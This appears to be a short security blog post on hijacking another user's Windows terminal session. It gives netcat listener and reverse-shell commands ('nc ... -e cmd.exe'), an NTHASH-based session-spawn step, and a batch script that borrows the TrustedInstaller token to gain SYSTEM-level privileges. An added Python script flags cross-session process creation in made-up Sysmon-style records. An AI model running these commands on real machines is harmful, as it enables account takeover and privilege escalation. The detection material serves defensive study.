Oct 30, 2019
In the previous article we (ab)used Windows tokens to steal someone else's account.

Let's see a different way to perform this task, this time (ab)using terminal services.

1. Retrieve the session id of your victim with qwinsta.

2. Open a listening shell (within the attacker session) to which the victim session will connect: nc -L -vv -p 9000

3. Spawn a process within the victim session which connects back to your listener: NTHASH-win64.exe /runts /user:session_id /binary:nc 127.0.0.1 9000 -e cmd.exe

And again, enjoy the output of your whoami.

Note that you need a special privilege (SeTcbPrivilege) to perform step 3 – my preference goes to using a « trustedinstaller » session (but many other contexts will do, like winlogon, etc.).

If need be, the below batch will create a new shell with proper privileges to perform step 3 above.

@echo off
rem Start the TrustedInstaller service so that a process holding its token exists.
net start trustedinstaller
rem Find the PID of the TrustedInstaller process and spawn a shell that uses its token
rem (the /system switch is part of the nthash tool's own syntax, as used by the author).
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )
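From the defender's side, the technique above leaves a distinctive trace in process-creation telemetry: a child process whose terminal session id differs from that of its parent. The script below is an added detection example, not part of the original post or of the nthash tool; it runs over constructed records shaped like Sysmon Event ID 1 (the field names ProcessGuid, ParentProcessGuid, Image, ParentImage, TerminalSessionId and User are Sysmon's, while the GUIDs, paths and user names are made up), and the default list of parents to ignore is an assumption to be tuned per environment.

```python
from typing import Iterable, List, Tuple

# Constructed sample records in Sysmon Event ID 1 style (not real telemetry).
# Records 1-2: a normal parent/child pair inside session 2.
# Records 3-4: a tool running with a SYSTEM token in session 2 creates a
# process (nc.exe) inside session 3, the "victim" session from the post.
SAMPLE_EVENTS = [
    {"ProcessGuid": "{A1}", "ParentProcessGuid": "{00}", "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "TerminalSessionId": 2, "User": "CORP\\alice"},
    {"ProcessGuid": "{A2}", "ParentProcessGuid": "{A1}", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "TerminalSessionId": 2, "User": "CORP\\alice"},
    {"ProcessGuid": "{B1}", "ParentProcessGuid": "{00}", "Image": r"C:\tools\NTHASH-win64.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "TerminalSessionId": 2, "User": "NT AUTHORITY\\SYSTEM"},
    {"ProcessGuid": "{B2}", "ParentProcessGuid": "{B1}", "Image": r"C:\tools\nc.exe",
     "ParentImage": r"C:\tools\NTHASH-win64.exe", "TerminalSessionId": 3, "User": "CORP\\bob"},
]

# Assumed allow-list: Windows components that legitimately create processes in
# other sessions (winlogon/services launching session processes). Tune this.
DEFAULT_IGNORED_PARENTS = ("winlogon.exe", "services.exe")


def find_cross_session_spawns(events: Iterable[dict],
                              ignored_parents: Tuple[str, ...] = DEFAULT_IGNORED_PARENTS
                              ) -> List[Tuple[str, int, int, str]]:
    """Return (child_guid, parent_session, child_session, child_user) for each
    process whose TerminalSessionId differs from its parent's. Parents are
    resolved from earlier records in the stream; unknown parents are skipped."""
    by_guid = {}
    hits = []
    for ev in events:
        by_guid[ev["ProcessGuid"]] = ev
        parent = by_guid.get(ev["ParentProcessGuid"])
        if parent is None:
            continue
        parent_name = parent["Image"].rsplit("\\", 1)[-1].lower()
        if parent_name in ignored_parents:
            continue
        if ev["TerminalSessionId"] != parent["TerminalSessionId"]:
            hits.append((ev["ProcessGuid"], parent["TerminalSessionId"],
                         ev["TerminalSessionId"], ev["User"]))
    return hits


if __name__ == "__main__":
    for hit in find_cross_session_spawns(SAMPLE_EVENTS):
        print("cross-session process creation:", hit)
```

Pair this with the parent's token identity (the SYSTEM-level parent in the sample) and with localhost network connections from the new process to raise confidence before alerting.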
